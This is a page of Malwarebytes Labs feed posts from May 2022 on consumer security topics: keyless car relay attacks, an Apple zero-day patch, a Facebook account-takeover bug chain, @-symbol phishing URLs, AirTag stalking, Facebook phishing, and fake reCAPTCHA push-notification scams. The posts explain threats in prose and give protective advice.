Techie Feeds

Car owners warned of another theft-enabling relay attack

Malwarebytes - Tue, 05/17/2022 - 20:16

Tesla owners are no strangers to seeing reports of cars being tampered with outside of their control. Back in 2021, a zero-click exploit aided a drone in taking over the car’s entertainment system. In 2016, we had a brakes and doors issue. 2020 saw people rewriting key-fob firmware via Bluetooth. Andin January this year, a teen claimed he had managed to remotely hack into 25 Tesla vehicles.

This time, we have another Bluetooth key-fob issue making waves. Although there is a Tesla specific advisory, there are also advisories for this issue generally and a type of smart lock.

Bluetooth Low Energy and keyless entry systems

The researchers who discovered this issue are clear that it isn’t “just” a problem for Tesla. It’s more of a problem related to the Bluetooth Low Energy (BLE) protocol used by the keyless entry system. Bluetooth is a short-range wireless technology which uses radio frequencies and allows you to share data. You can connect one device to another, interact with Bluetooth beacons, and much more. Bluetooth is a perfect fit for something as commonplace as keyless door entry.

As the name suggests, BLE is all about providing functionality through very low energy consumption. As BLE is only active for very short periods of time, it’s a much more efficient way to do things.

The relay attack in action

Researchers demonstrated how this compromise of the keyless system works in practice. Though light on details, Bloomberg mentions it is a relay attack. This is a fairly common method used by people in the car research realm to try and pop locks.

To help describe a relay attack, it’s common to first explain how a Man in the Middle (MitM) attack works:

In cybersecurity, a Man-in-the-Middle (MitM) attack happens when a threat actor manages to intercept and forward the traffic between two entities without either of them noticing. In addition, some MitM attacks alter the communication between parties, again without them realizing.

For relay attacks, think of two people (or one person with two devices) sliding their way into the device-based communication. Some of the diagrams I’ve seen explaining this attack can be a little confusing, but this video explanation is perfect:

As you can see, two people approach the car. One pulls the handles to trigger the car’s security system into sending out a message. “Are you the owner of this car, are your keys the correct keys for this vehicle?” The authentication challenge is beamed out into the void. The second person is standing by the house with a device.

People often leave their car keys close to the front door. As a result, the keys will be within range of the second person’s device. It takes the fob’s response and beams it back to the criminal by the car. The device in their hand relays the fob’s authentication confirmation to the car and the door unlocks. They then repeat this process a second time. This is to fool the car into thinking the keys are present, at which point they’re able to drive away.

A gear-shift in criminal perspective

Criminals are after maximum gain for minimum effort. They don’t want to attract attention from law enforcement. The sneakier they can be, the less commotion they cause, and the better it’s going to be for them in the long-term.

Think about how seamless a relay approach is to car theft. It’s quick, it’s easy, and it’s completely silent. Consider how much money a professional outfit pulling these car heists can generate. The alternative is messy break-ins, noise, rummaging for keys in a house full of screaming people and barking dogs. Not to mention a significantly increased chance of being caught. If you were a career criminal, which approach would you favour?

A problem which refuses to go away

Relay attacks on cars have been around for several years now. Stolen vehicles are the go-to example of relay attacks if you go looking for more information on the technique. Advice for avoiding relay attacks is widespread, from keeping keys away from the front door (which you should do anyway) to placing them in a signal-blocking bag.

For the Tesla specific attack, a relay device was placed “within roughly 15 yards” of the smartphone/key-fob, with the other plugged into a laptop close to the vehicle. You can see more information about the more general forms of attack here.

The article mentions that there’s no evidence of this Tesla tomfoolery having happened in the wild. Even so, relay attacks can and do take place. If your car operates a keyless system, take this latest report as a heads-up to ensure your vehicle is safe from attack no matter the make or model.

The post Car owners warned of another theft-enabling relay attack appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Update now! Apple patches zero-day vulnerability affecting Macs, Apple Watch, and Apple TV

Malwarebytes - Tue, 05/17/2022 - 20:00

Apple has released security updates for a zero-day vulnerability that affects multiple products, including Mac, Apple Watch, and Apple TV.

The flaw is an out-of-bounds write issue—tracked as CVE-2022-22675—in AppleAVD, a decoder that handles specific media files.

An out-of-bounds write or read flaw makes it possible to manipulate parts of the memory which are allocated to more critical functions. This could allow an attacker to write code to a part of the memory where it will be executed with permissions that the program and user should not have.

Attackers could take control of affected devices if they exploit this flaw.

CVE-2022-22675 is the same vulnerability that affected macOS Monterey 12.3.1, iOS 15.4.1, and iPad 15.4.1. The flaw for these was patched in March.

This latest batch of updates has improved bounds checking for additional Apple products running specific operating systems, particularly macOS Big Sur 11.6.6, watchOS 8.6, and tvOS 15.5. These OSs are installed in Apple Macs running Big Sur, Apple Watch Series 3 and later, and Apple TV (4K, 4K 2nd generation, and 4K HD).

Apple says it’s aware this flaw is currently being abused in the wild. It didn’t go into detail, likely to give customers time to patch up their Apple devices.

BleepingComputer has noted that attacks against CVE-2022-22675 might only be targeted in nature. However,if you’re using any or all of the above Apple products we mentioned, it is still wise to apply updates as soon as you can.

Stay safe!

The post Update now! Apple patches zero-day vulnerability affecting Macs, Apple Watch, and Apple TV appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Gmail-linked Facebook accounts vulnerable to attack using a chain of bugs—now fixed

Malwarebytes - Tue, 05/17/2022 - 19:37

A security researcher has disclosed how he chained together multiple bugs in order to take over Facebook accounts that were linked to a Gmail account.

Youssef Sammouda states it was possible to target all Facebook users but that it was more complicated to develop an exploit, and using Gmail was actually enough to demonstrate the impact of his discoveries.

Linked accounts

Linked accounts were invented to make logging in easier. You can use one account to log in to other apps, sites and services. The most commonly used is the link between Facebook and Instagram, so we will use that as an example. Log in to one account and you are also practically logged in at the other. All you need to do to access the account is confirm that the account is yours.

Since 2009, Facebook has supported myOpenID, which allows users to login to Facebook with their Gmail credentials. To put it in a simpler way, this means that if you are currently logged in to your Gmail account, the moment you visit Facebook, you will be automatically logged in.

Sandboxed CAPTCHA

The first discovery that enabled this takeover method lies in the fact that Facebook uses an extra security mechanism called “Checkpoint” to make sure that any user that logs in is who they claim to be. In some cases Checkpoint present those users with a CAPTCHA challenge to limit the number of tries.

Facebook uses Google CAPTCHA and as an extra security feature the CAPTCHA is put in an iFrame. The iFrame is hosted on a sandboxed domain ( to avoid adding third-party code from Google into the main domain ( An iFrame is a piece of HTML code that allows developers to embed another HTML page on their website.

Now, for some reason, probably for logging purposes, the URL for the iFrame includes the link to the checkpoint as a parameter.

For example, let’s say the current URL is In that case the iframe page would be accessible through this URL:

The attacker can replace the referrer part in the URL by changing it into a next parameter. This allows the attacker to send the URL including the login parameters to the sandbox domain. Now it is time to find a way to grab it from there, which is where cross-side-scripting (XSS) comes in.


XSS is a type of security vulnerability, and can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. Attackers can use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy.

The same-origin policy (SOP) is where a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. This policy prevents a malicious script on one page from obtaining access to sensitive data on another web page.

In this case that step was easy, since Facebook allows developers to test certain features and makes it possible for them to upload custom HTML files. The creator can upload these HTML files to the domain. Which, as we saw earlier, is also in use for the Google CAPTCHA. Which allows the attacker to bypass the same origin policy since the target site and the custom script are on the same domain.


CSRF is short for cross-site request forgery. In a CSRF attack, an innocent end user is tricked by an attacker into submitting a web request that they did not intend. This may cause actions to be performed on the website that can include inadvertent client or server data leakage, change of session state, or manipulation of an end user’s account.

In his attack script, Youssef used undisclosed CRSF attacks to log the target user out and later log them back in through the Checkpoint.


OAuth is a standard authorization protocol. It allows us to get access to protected data from an application. An OAuth Access Token is a string that the OAuth client uses to make requests to the resource server.

In this case, attackers can log out the current user and then log them back in to the attacker account which is in the Checkpoint state. But how does that allow the attacker to take over the Facebook account? By intercepting an OAuth Access Token string.

This is done by targeting a third-party OAuth provider that Facebook uses. One of these providers is Gmail. Gmail sends back the OAuth Access token to for the logged in user. And since the attacker can steal the URL including the login parameters by sending them to the sandbox domain, they can intercept the OAuth Access Token string and the id_token of the user.


Summarized, the attacker can upload a script to the Facebook sandbox and try to trick his target(s) into visiting that page by sending them the URL.

Simplified, the script will:

  1. Log out the user from his current session (CSRF)
  2. Send them to the Checkpoint to log back in (CSRF)
  3. Open a constructed URL that redirects the target to Facebook.

Once the target has visited the page with the script outlined above, the attacker can start harvesting the strings they need to take over the Facebook account.

  1. The attacker waits for the victim to log in and can later extract the Google OAuth Access Token string and id_token
  2. Using the email address included in the id_token they can start a password recovery process
  3. Now the attacker can construct a URL to access the target account with all the data they have gathered
How to unlink accounts

Some sites will offer to log you in using your Facebook credentials. The same reasoning that is true for using the same password for every site is true for using your Facebook credentials to login at other sites. We wouldn’t recommend it because if anyone gets hold of the one password that controls them all, you’re in even bigger trouble than you would be if only one site’s password is compromised.

You can check which accounts are linked to your Facebook account by opening the Facebook settings menu. Scroll down and open Settings & Privacy, then open Settings. At the bottom on the left, use the Accounts Center button. Tap Accounts & Profiles. There you can see a list ofthe accounts linked to your Facebook account. You can remove any unwanted linked accounts there.

Facebook fix

Youssef says he reported the issue to Facebook in February. It was fixed in March and a $44,625 bounty was awarded earlier this month.

We interviewed this Youssef last year. He told us he’s submitted at least a hundred reports to Facebook which have been resolved, making Facebook a safer platform along the way.

The post Gmail-linked Facebook accounts vulnerable to attack using a chain of bugs—now fixed appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Long lost @ symbol gets new life obscuring malicious URLs

Malwarebytes - Tue, 05/17/2022 - 14:41

Threat actors have rediscovered an old and little-used feature of web URLs, the innocuous @ symbol we usually see in email addresses, and started using it to obscure links to their malicious websites.

Researchers from Perception Point noticed it being used in a cyberattack against multiple organization recently. While the attackers are still unknown, Perception Point traced them to an IP in Japan.

The attack started with a phishing email pretending to be from Microsoft, claiming the user has messages that have been embargoed as potential spam. (Using familiar, transactional messages from well-known brands like Microsoft has become a popular tactic for scammers, as a way to defeat spam filters and keen-eyed users.)

The message reads:

You have new 5 held messages. You can release all of your held messages and permit or block future emails the senders, or manage messages individually.

If the recipient clicks any of the links in the email, they are directed to a phishing page made to look like an Outlook login page.

If the recipient follows the often-repeated advice to hover their pointer over the links before clicking them, to see where they go, they will see this weird-looking URL, and probably be none the wiser:


This is almost certainly designed to bamboozle users, but to your computer it looks fine. As weird as this URL appears, it is actually valid and acceptable, and your browser will happily parse it for you.

Users who clicked on the link were passed through a chain of redirects before ending up at a phishing page that looks like the Outlook login screen.

The phishing site is a copy of the Outlook login page Reading the URL

As weird as it looks, the URL in this phishing campaign sticks to the rules of what’s allowed in a web address. The part you see least often is the @ symbol. RFC 3986 refers to anything after https:// and before the @ symobl, highlighted below, as userinfo. This part of the URL is for passing authentication information like a username and password, but it is very rarely used, and is simply ignored as a so-called “opaque string” by many systems.


The last part of the URL after the # is also ignored when you click the link. This is called the fragment identifier and it represents a piece of the destination page. The browser might use it to scroll to a section of the destination page, or it might be used to pass information to the destination page, but it plays no part in determining what the destination actually is.

In this case the fragment ID—ZmluYW5jZUBuZ3BjYXAuY29t—appears to be a unique ID that identifies the email address the phish was sent to. If it’s removed, the link works but when you reach the final destination it simply shows a loading icon, perhaps to hide the site’s true intentions to accidental visitors or researchers.

What we are left with when we remove the parts that of the link that are ignored by the browser is a very ordinary-looking link. Exactly the kind of thing you might think is suspicious in an email that says it’s from Microsoft.

As you probably know, is a URL shortening service. The link redirects users to another URL, likely used for tracking, which itself redirects users to the phishing page.

Does your browser support the @ symbol?

If you are one of the 2.6 billion people using Chrome, the answer is “yes”, URLs that use the @ symbol work in Chrome and other Chromium-based browsers such as Vivaldi, Brave, and Microsoft Edge.

The latest version of Microsoft’s Internet Explorer doesn’t parse URLs with the @ delimiter though.

Firefox and Firefox-based browsers, such as Tor and Pale Moon, are also affected.

And what about Safari?

According to Thomas Reed, Malwarebytes’ Director of Mac and Mobile, “This technique appears to work in Safari and all other major Mac browsers. Firefox will show a warning when attempting to visit such a link. Unfortunately, Safari—the most popular browser on macOS—does not display a warning and opens the link without objection, as does Chrome.”

Reed also points out that email software will often look for URLs in plain text emails and convert them to clickable links, but the @ symbol seems to prevent this. According to Reed: “The URL used by the phishing campaign does not become a clickable link by itself.” The links will still work in HTML emails, so this isn’t much of a barrier, just a feather in the cap of hold outs who insist on viewing their emails in plain text!

The wide support for the confusing and little-used @ symbol could see it used more widely. In a Threat Post interview, Perception Point’s Vice President of Customer Success and Incident Response, Motti Elloul, predicted that this won’t be the last time we’ll see phishing attacks taking advantage of it.

“The technique has the potential to catch on quickly, because it’s very easy to execute,” he said. “In order to identify the technique and avoid the fallout from it slipping past security systems, security teams need to update their detection engines in order to double check the URL structure whenever @ is included.”

The post Long lost @ symbol gets new life obscuring malicious URLs appeared first on Malwarebytes Labs.

Categories: Techie Feeds

AirTag stalking: What is it, and how can I avoid it?

Malwarebytes - Tue, 05/17/2022 - 14:12

More voices are being raised against the use of everyday technology repurposed to attack and stalk people. Most recently, it’s reported that Ohio has proposed a new bill in relation to electronic tagging devices.

The bill, aimed at making short work of a loophole allowing people with no stalking or domestic violence record to use tracking devices, is currently in the proposal stages. As PC Mag mentions, 19 states currently ban the use of trackers to aid stalking.

Dude, where’s my car?

Using tech to find missing items is nothing new. Back in the 80s, my dad had one of the new wave of tools used to find your lost keys. You put a small device on your keychain, and when they inevitably went missing, you whistled. The device, assuming it was nearby, would beep or whistle back. That is, it would if the range wasn’t awful and it frequently didn’t respond to your best whistle attempts.

Skip forward enough years, and we had similar concept but with Bluetooth and Radio Frequency. But the range on them isn’t great and so the use is limited.

Step up to the plate, tracker devices.

What is an AirTag?

There are many types of tracking device, but AirTags are unfortunately for Apple the one most closely associated with this form of stalking.

Find My, an app for Apple mobiles, is an incredibly slick way to keep track of almost any Apple product you can think of. Making your lost phone make a noise, offline finding, and sending the last location when battery is low are some of the fine-tune options available.

An AirTag is a small round device which plugs right into the Find My options. The idea is a supercharged version of ye olde key whistler. Misplace an item attached to an AirTag, and when you get close enough you’ll even have Precision Finding kicking in to guide to the lost item.

This is all incredibly helpful, especially if you’re good at misplacing things. Even better if something is stolen. Where it goes wrong is when people with bad intentions immediately figure out ways they can harass people with it.

A stalker’s life for me

Back in January, model Brooks Nader claimed someone placed an AirTag in her coat. Whoever was responsible used it to follow her around for several hours. She only became aware of what was happening because her phone alerted her to the tag’s presence.

However, this is an Apple-specific product, which means not all devices will be able to flag it. Android users are resorting to downloading standalone apps which can flush out unwanted AirTag stalkers. Meanwhile, the case numbers themselves are steadily increasing across multiple regions. Smart stalkers will place tags on items or in places victims won’t suspect. A tag under the car means victims may never even find out they’ve been stalked in the first place.

Apple pushes back on AirTag stalking

This isn’t great news for any company faced with a sudden wave of people abusing their devices. Apple is trying to lead the charge against these practices by making it harder for stalkers.

  • Improving the accuracy of “unknown accessory detected” notices
  • Adding support documents for people who believe they may be being stalked.
  • Implementing notices which say “tracking without consent is a crime”
Advice for people worried about AirTag stalking

Apple’s support document lists two ways to discover unwanted tracking.

  1. If you have an iPhone, iPad, or iPod touch, Find My will send a notification to your Apple device. This feature is available on iOS or iPadOS 14.5 or later. To receive alerts, make sure that you:
    Go to Settings > Privacy > Location Services, and turn Location Services on.
    Go to Settings > Privacy > Location Services > System Services. Turn Find My iPhone on.
    Go to Settings > Privacy > Location Services > System Services. Turn Significant Locations on to be notified when you arrive at a significant location, such as your home.
    Go to Settings > Bluetooth, and turn Bluetooth on.
    Go to the Find My app, tap the Me tab, and turn Tracking Notifications on.
  2. If you don’t have an iOS device or a smartphone, an AirTag that isn’t with its owner for a period of time will emit a sound when it’s moved. This type of notification isn’t supported with AirPods.

Any alert on your mobile device that a tracker is nearby allows you to make the tracker produce a noise via your phone. You can make this noise repeat as often as you want until the device is found.

Disabling the AirTag

If you can’t find the physical object, don’t worry. You can disable it, again using your phone. Apple’s advice:

To disable the AirTag, AirPods, or Find My network accessory and stop it from sharing its location, tap Instructions to Disable and follow the onscreen steps. After the AirTag, AirPods, or Find My network accessory is disabled, the owner can no longer get updates on its current location. You will also no longer receive any unwanted tracking alerts for this item.

Apple has been quite visible in both drawing attention to the problem and providing accessible and straightforward solutions to shutting unwanted tracking down. We can only hope that other companies whose trackers are being misused in this way are doing their part too.

The post AirTag stalking: What is it, and how can I avoid it? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

“Look what I found here” phish targets Facebook users

Malwarebytes - Tue, 05/17/2022 - 10:54

Facebook-themed messages are a frequent source of bogus links from both spam and compromised accounts. Whether you receive the messages via SMS, the Messenger app, or just inside regular web chat, it pays to be careful. A wide variety of attacks use bogus messages as their launchpad, and the risk of account compromise is ever-present. Phishing is not the only threat. Scammers will also happily send “check this out” messages and direct you to malware. This is why it’s crucial to be careful around links…any link. You just never know.

One such phishing message is currently doing the rounds in Dutch, and it plugs into a sense of FOMO to encourage you to click the link. It was first observed back in March, and appears to be making a comeback.

How does this phish attack work?

This is the message currently in circulation, being distributed through a compromised account:

Kijk eens wat ik hier heb gevonden?? [url]

The message says “Look what I found here”.

This is a very common tactic, not giving anything away and almost baiting you into clicking. There’s a few others along these lines being sent to people in Facebook Messenger at the moment. One style of message is one that asks something along the lines of “Have you seen who died/Guess who died”. The answer, of course, is nobody has died. However, the aim of the game is to have you panic and hit the link without thinking.

It’s a similar technique in play here, although nowhere remotely as panic-inducing.

All the same, the link redirects to a fake Facebook page on what looks like a compromised photography website.

The site says “Facebook needs to verify that it’s you, log in to continue” and asks for mobile number/email and password.

Hitting the login button submits the data and redirects you through several different domains. In testing, we kept hitting a Google 404 error but you may well end up somewhere else depending on region, type of browser, device, and so on.

If you’ve entered your login after clicking through from a random message in this fashion, stop what you’re doing. Go to Facebook and change your password as soon as you possibly can.

The power of “friendly” messaging

The big problem with rogue messages via IM is the aspect of sender trust. If a link is sent to you from a total stranger on a public platform like Twitter, you’ll probably be sceptical and treat it with the caution it deserves. An SMS from a number you don’t recognise? They have some success depending on scam type, but you’d probably expect a banking phish or a fake parcel delivery message through that route.

But if you get a message from someone within your closed network of friends and family, where you may interact dozens or even hundreds of times a day, then it’s likely you’ll be clicking those links with a lot more confidence.

Sadly, accounts belonging to those you trust can be hijacked like any others. If your dad’s Facebook account was compromised yesterday and you woke to a link and a message which reads “Look what I found here”, what would you do?

Phishers know that if they can crack an account, it’ll almost certainly be allowed to send messages to people in its immediate circle as their security settings will permit them access. After all, you don’t add your closest relatives to Facebook and then prevent them from sending you messages.

Tips to avoid falling for rogue messages
  • Watch out for messages which don’t logically follow on from the natural flow of a conversation, or a few hours after you stopped talking. “This you”, “Have you seen this photo”, “Did you hear who died”, “OMG I can’t believe it” all tied to a URL should raise some red flags.
  • If you’re presented with a “Login to view content” box, question why that is. If you’re on the Facebook website talking to someone and already logged in, there should be no reason why you’d be asked to login again. Check the URL. Does it say Or is it a totally unrelated domain?
  • If you have an alternative method of communication with the person who sent you the message, try it. Ask them if they sent you a message on Facebook, and wait for their response before doing anything.
  • Enable 2-factor authentication (2FA). If you hand over your password to a phishing page, the phisher can’t do much with it while you’re protected with 2FA. This isn’t a silver bullet though, as more and more phishers are also taking 2FA codes with them when they phish your details.
  • Add login alerts to your Facebook account. If someone does manage to get hold of your login credentials and access your account, you’ll get notified by Facebook as soon as this happens so you can grab your account back as soon as possible.

Once your friend or family member regains access to their account, you can point them to these tips for keeping their own account locked down too. This way, you’ll be that little bit more safer next time account harvesting phishers are on the prowl.

Stay safe out there!

The post “Look what I found here” phish targets Facebook users appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Why MRG-Effitas matters to SMBs

Malwarebytes - Mon, 05/16/2022 - 13:07

When selecting the right cybersecurity vendor to protect their operations, small- and medium-sized businesses (SMBs) can lean on several third-party research organizations that analyze which cybersecurity products can best prevent, detect, and clean up various types of cyberattacks today.

But these tests can sometimes assume a level of end-user complexity—and funding and staffing—that the average SMB might lack. Without a full-time security team, or even a single full-time internal IT hire, an SMB could unwittingly purchase a cybersecurity product that, while effective, requires a level of expertise they simply do not have.

This is where one third-party research team, in particular, can help.

MRG-Effitas, which produces quarterly reports about cybersecurity products that publicly participate in evaluations, focuses its analyses on “real world” malware attacks and detection capabilities. Not only do the researchers test malware samples that are currently infecting endpoints across the world, but the researchers also stress the importance of simple, effective notifications that will help the average user respond to any detected cyberthreat.

“Simulating normal user behaviour means that we pay special attention to all alerts given by security applications,” wrote the researchers in their most recent quarterly report for their program, the “360° Assessment & Certification.”

The 360° Assessment & Certification combines several tests that are then grouped into four separate certifications. Based on how a cybersecurity product performed in certain tests, that product will either earn a certificate or not. This almost-binary representation of a product’s performance is simple and effective, and it can help to quickly inform an SMB about whether a certain product is right for their company.

At the core of the MRG-Effitas certification process—which tests how products respond to known exploits, ransomware, botnets, adware, and more—is the user.

“A pass is given only when alerts are straightforward, and clearly suggest that the malicious action should be blocked,” the report said. “With this in mind, it is very important to note that the best choice for an average user is to keep things as simple as possible and not to overwhelm them with cryptic pop-ups, alerts or questions.”

Testing and certification

The 360° Assessment & Certification by MRG-Effitas involves the following nine rounds of testing:

  • In the Wild/Full Spectrum Test
  • PUA/Adware Test
  • Exploit/Fileless Test
  • Real Botnet Test
  • Banking Simulator Test
  • Ransomware Simulator Test
  • False Positive Ransomware Test
  • False Positive Test
  • Performance Test

Each test has a specific purpose, from testing how cybersecurity products respond to an end-user visiting a malicious URL that delivers malware, to the detection of non-malicious but meddlesome applications such as adware, to even testing how a product responds to live ransomware samples observed in real world applications, and to simulated ransomware samples developed by MRG-Effitas. Importantly, MRG-Effitas also tests the performance load of each cybersecurity product, analyzing how much time it takes to perform certain tasks on devices that have the cybersecurity product installed.

While MRG-Effitas performs testing in the above nine categories, it only awards certificates in four categories: The 360° Assessment, the 360° Exploit Degree, the 360° Online Banking Degree, and the 360° Ransomware Degree.

For the 360° Assessment, MRG-Effitas assigns two levels of certification—Level 1 and Level 2—depending on how successfully a cybersecurity product detected the cyberthreats that were launched at it during testing. A vendor only receives Level 1 certification if it detected all threats on “first exposure or via behaviour protection,” the report said, and it passed the Real Botnet Test.

The malware load used during the 360° Assessment is significant. In the most recent round, it involved 360 “In The Wild” samples that included: “20 trojans, 54 backdoors, 50 financial malware samples, 53 ransomware, 49 spyware, 84 malicious documents, [and] 50 malicious script files.”

Just four products publicly received a Level 1 certification in the recent 360° Assessment: Malwarebytes Endpoint Protection, Bitdefender Endpoint Security, Microsoft Windows Defender, and Symantec Endpoint Protection.

A similar test deploys 50 financial malware samples against the detection and protection capabilities of the cybersecurity products, along with simulated banking malware. Five products publicly received the 360° Online Banking Certification: Malwarebytes Endpoint Protection, Avira Antivirus Pro, Bitdefender Endpoint Security, ESET Endpoint Security, and Symantec Endpoint Protection.

Ransomware simulations

In just the past decade, ransomware has evolved tremendously. Developers of the infamous family of malware have gone from asking for measly sums of money from individuals to creating entire business models in which they license out their ransomware tool to other threat actors. When those threat actors successfully hit a business—which they could have purchased access to from other threat actors—the original ransomware developers take a cut of whatever eventual payment is made. To make matters worse, threat actors have also begun deploying ransomware that not only encrypts a company’s files, but it also first exfiltrates any sensitive data, which the threat actors then use as a second point of leverage: Pay up or your data will be published for everyone to see.

The researchers at MRG-Effitas, recognizing this rapid pace of ransomware evolution, have, for years, tested cybersecurity products against ransomware samples developed in-house that could represent where ransomware development is headed in just months or years.

In the most recent 360° Assessment & Certification, MRG-Effitas deployed 53 ransomware samples against the cybersecurity products, and an additional four simulated ransomware samples. To achieve the 360° Ransomware Certification, a product must have protected a device from the 53 ransomware samples and 4 simulated ransomware simulated samples, and it must have passed the false positive ransomware test.

In the most recent round of testing, all nine publicly-evaluated cybersecurity products achieved ransomware certification.


Understanding whether a cybersecurity product works well is, obviously, important. But of similar importance to SMBs is understanding what impact a cybersecurity product will have on a suite of endpoints. Without large budgets that could allow for constantly refreshed, new devices to be purchased, SMBs should consider how much a cybersecurity product could slow down their organizations’ devices.

Thankfully, MRG-Effitas analyzes cybersecurity products based on their impact on performing simple operations, like downloading a file, opening a Microsoft Office program, or opening a website. The analysis also measures the time spent performing a security software update and the CPU usage during the update process.

Unlike the certificates offered by MRG-Effitas for other categories, there is no certificate or “pass/fail” result when testing performance. Instead, SMBs can look at the performance measurements for each product in the latest 360° Assessment & Certification.

Less “interpretation,” quicker answers

The simplicity of MRG-Effitas’ 360° Assessment & Certification gives SMBs a quick guide into what cybersecurity products could be the right fit for them. Without having to dive into countless interpretive reports from each cybersecurity vendor, SMBs can instead look at the most recent 360° Assessment & Certification and ask themselves: Which of these products received certification and which did not?

Knowing that MRG-Effitas hews its testing ideology to the user—only offering certifications for products that clearly notify and warn users about how to respond to a threat—SMBs can be sure that whatever tool they choose will, at the very least, be easy to use on their end.

The post Why MRG-Effitas matters to SMBs appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How COVID-19 fuelled a surge in malware

Malwarebytes - Mon, 05/16/2022 - 12:28

2021 saw a massive surge in detections of malware, adware, and Potentially Unwanted Programs (PUPs). It didn’t matter what the computers were used for or what operating system they ran—across business and home computers, on Windows and on Mac, detections went up, enormously.

Detections of malware on Windows business machines were 143% higher in 2021 than in 2020, and 65% higher on consumer machines.

Windows malware detection totals 2019-2021

Detections of malware, adware, and PUPs on macOS increased almost 220%.

Mac malware, adware and PUP detection totals 2019-2021

The background to this extraordinary jump in detections is the coronavirus pandemic, so we call this surge in detections the “Covid bounce”.

The Covid bounce

In 2020, the recently-discovered novel coronavirus, and the restrictions put in place to slow its progress, caused trillions of dollars of lost economic activity and a mass migration of knowledge workers from offices to homes.

Almost all forms of business suffered—even illegal ones like cybercrime. Crooks were just as likely to get COVID-19 as anyone else, and the targets they preyed upon changed beyond recognition.

Many businesses wound down or folded, and those that didn’t had to upend their IT infrastructure overnight to support working from home. How people worked, where they worked, the tools they used, and the things they cared about were all in flux.

No wonder then, that in 2020, malware detections on Windows business machines fell 24%.

The effect was not spread evenly across all types of malware though. Detections of Emotet and TrickBot collapsed by 89% and 69% respectively, leading some to speculate that while these highly sophisticated forms of malware were extremely effective at permeating corporate networks they may be poorly adapted to exploit the work-from-home environment.

Meanwhile, detections of hacking tools, information stealers, and other malware that could help criminals better understand the transformation in their victims’ environments, increased considerably.

In 2021, as restrictions lifted gradually around the world, and as organisations and the criminals preying on them adapted to remote and hybrid work, detection numbers climbed precipitously.

And they didn’t simply return to the pre-Covid status quo, they soared past 2019’s numbers. In 2021, the detection numbers for business threats were 85% higher than in 2019, and consumer threat detections were 47% higher.

Cryptocurrency values soared in 2021 and, to nobody’s surprise, detections of malware that mines cryptocurrencies increased more than 300 precent.

Adware, spyware, and worms all displayed an enormous bounce back in 2021, climbing 200%, and detections of email threats showed a considerable “Covid bounce” too. But while the old guard of Emotet and TrickBot remained, they were not the presence of old as several new pretenders jostled for position.

It is impossible to say why detections bounced back so alarmingly last year, but the plain fact is that the world now is not the world of 2019. Events like the coronavirus pandemic have far-reaching effects that go far beyond the immediate, obvious and tragic health consequences, affecting all walks of life, even the security of your servers, laptops, and remote workers.

The pandemic accelerated the transition from a bricks-and-mortar to online existence, and for many businesses and services there is no going back.

After a period of adjustment and uncertainty in 2020, cybercrime seems to have emerged supremely well adapted to this new reality.

You can learn more about the Covid bounce and how it changed the outlook for cyberthreats into 2022 and beyond in the Malwarebytes 2022 Threat Review.

The post How COVID-19 fuelled a surge in malware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fake reCAPTCHA forms dupe users via compromised WordPress sites

Malwarebytes - Mon, 05/16/2022 - 11:54

Researchers at Sucuri investigated a number of WordPress websites complaining about unwanted redirects and found websites that use fake CAPTCHA forms to get the visitor to accept web push notifications.

These websites are a new wave of a campaign that leverages many compromised WordPress sites.


CAPTCHA (“Completely Automated Public Turing test to tell Computers and Humans Apart”) is one of the annoyances that we have learned to take for granted when we browse the Internet. Scientists developed CAPTCHA as a method to tell humans and bots apart so as to to keep bots from accessing sites or systems where they are not welcome.

Google bought and owns reCAPTCHA, which represents a CAPTCHA system expressly developed to reduce the needed amount of user interaction. The original version asked users to decipher hard to read text or match images. Version 2 required users to decipher text or match images if the analysis of cookies and canvas rendering suggested an automatic download of the page. Since version 3, reCAPTCHA doesn’t interrupt users, running automatically when users load pages or click buttons.

The basic version of a real reCAPTCHA the threat actors used as a template to create the fake ones looks like this:

legitimate reCAPTCHA The campaign

The fake CAPTCHA sites are part of a long lasting campaign responsible for injecting malicious scripts into compromised WordPress websites. This campaign leverages known vulnerabilities in WordPress themes and plugins and has impacted an enormous number of websites over the years.

The compromised websites all share a common issue. The threat actors injected malicious JavaScript within the affected website’s files and database. Attackers attempted to automatically infect any .js file with jQuery in the name, on a compromised website. They then injected obfuscated code when successful. This malicious JavaScript was appended under the current script or under the head of the page where it was fired on every page load, redirecting site visitors to the destination chosen by the threat actor.

The Malwarebytes Threat Intelligence Team tracked a rogue affiliate’s traffic which flowed through the same local[.]drakefollow[.]com subdomain that was mentioned in the Sucuri blog. The threat actor chose to promote a legitimate security product in this case, but might as well have led visitors to potentially unwanted programs (PUPs), adware, or tech support scams.

Traffic flow from compromised WordPress site to rogue affilate’s site The fake CAPTCHA

At this point in the chain of redirections, the fake reCAPTCHA websites kick in. The fake reCAPTCHA sites are the final step towards duping the visitor. The unsuspecting visitor will land on a site that tries to trick them into accepting push notifications from the landing page’s domain.

fake reCAPTCHA

Visitors think they need to click “Allow” to get past the CAPTCHA screen, when in fact they are giving permission to the domain to send them push notifications.

By design, push notifications work similarly across different operating systems and web browsers. They appear outside of the browser window just above the taskbar on the right hand side. This is misleading as they may seem to originate from the operating system. Knowing the difference between a web push notification and an alert that comes from the operating system or another program installed on the device is hard, and that makes it difficult for the unsuspecting user of an affected system to know what is going on.

As we reported in the past, adware, search hijackers, and PUP families have added push notifications as one of their attack vectors. Sucuri warns that it is also one of the most common ways attackers display “tech support” scams, where users are told their computer is infected or slow and they should call a toll-free number to fix the problem.

Removal and mitigation

Knowing that these fake reCAPTCHA sites exist and being able to spot the difference with a real one is your best protection. Also, many security programs, including Malwarebytes, will block access to the campaign’s domains.

If your system shows you push notifications, you can find detailed instructions on how to disable and remove permissions for browser push notifications in our article: Browser push notifications: a feature asking to be abused.

Website owners can use Sucuri’s free remote website scanner to detect the malware.

Stay safe, everyone!

Special thanks to the Malwarebytes Threat Intelligence Team for their contribution and the screenshot

The post Fake reCAPTCHA forms dupe users via compromised WordPress sites appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis

Malwarebytes - Mon, 05/16/2022 - 10:00

